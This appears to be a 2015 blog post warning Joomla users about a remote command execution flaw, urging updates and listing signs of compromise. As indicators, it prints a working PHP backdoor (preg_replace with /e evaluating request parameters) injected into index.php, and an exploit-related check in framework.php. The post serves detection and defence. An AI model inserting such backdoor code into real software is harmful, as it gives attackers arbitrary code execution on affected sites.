There is a serious vulnerability that can be easily exploited and is already in the wild. It affects all versions from 1.5 to 3.4. Details here: Critical 0-day Remote Command Execution Vulnerability in Joomla
If you are using Joomla 3, please update immediately to Joomla 3.4.6.
Update Dec 22, 2015: Joomla 3.4.7 has also just been released. However, Joomla 3.4.7 changed the way session variables are being handled (details here). As such, some of your extensions might no longer work after upgrading to Joomla 3.4.7. Would suggest you update to Joomla 3.4.6 first and do some testing to make sure all extensions are working before you update to Joomla 3.4.7.
How to Check
I have quite a number of friends who are being hit by this.
Some signs of being attacked are as follows. Take at look at your <Joomla_Root_Folder>/index.php OR <Joomla_Root_Folder>/includes/framework.php. If you see any of the following in the first few lines of the code, then your site is being hit.
- The following from
<Joomla_Root_Folder>/index.php:
<?php
if (isset($_REQUEST["gf"])) {/*xncVpILmY*/@preg_replace('/(.*)/e', @$_REQUEST['gf'], '');}
if (isset($_REQUEST["Ix"])) {@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}
if (isset($_REQUEST["Ps"])) {/*CzwNjYUj*/@preg_replace('/(.*)/e', @$_REQUEST['Ps'], '');/*wEKRfiiQ*/}
if (isset($_REQUEST["Ix"])) {/*NemlUoamst*/@preg_replace('/(.*)/e', @$_REQUEST['Ix'], '');}
if (isset($_REQUEST["LyYE"])) {@preg_replace('/(.*)/e', @$_REQUEST['LyYE'], '');}
/**
* @package Joomla.Site
*
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
- The following from
<Joomla_Root_Folder>/includes/framework.php:
<?php if(stripos($_SERVER["HTTP_USER_AGENT"], "JDatabaseDriverMysqli") !== false || stripos($_SERVER["HTTP_X_FORWARDED_
FOR"], "JDatabaseDriverMysqli") !== false) exit;
/**
* @package Joomla.Site
*
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/